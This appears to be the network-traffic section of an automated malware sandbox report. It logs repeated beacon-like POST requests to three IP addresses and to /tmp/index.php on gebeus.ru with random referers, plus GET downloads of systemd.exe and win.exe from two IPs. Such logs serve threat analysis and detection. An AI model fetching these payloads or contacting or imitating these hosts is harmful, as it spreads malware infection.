    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1412
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://otvdelfrveshsj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gertosepucdr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://auihegamujgli.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjxtqtcjxrgf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kohgiaokgvetlns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfhspraqocnicu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovmeaseeesddavq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hgoopfcuaxxcsy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://obswclybvegixrj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: gebeus.ru
    Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxxpyoqdjpxpiu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iokxfgvwlwvbn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tdhyqfiiuytxgxp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pojiqquohhri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vowgfyyfrgsdo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prmalwoksspqb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: gebeus.ru
    Source: global trafficHTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jvyahgkmsjudiynh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdpeqpsppgevmdmy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fspagvqqxpvnoc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bisribucgcplqa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cuacgvevesxxi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ytbwubxpmuvtgbr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sflpljrbacyl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eiyfgialotb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tcaoqcerkkqpxcv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cgqjakxfbvjd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://acdyanixqocc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sphopwrqrdvrdc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbvhstcjoya.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: gebeus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gverqeqrcdjfj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: gebeus.ru
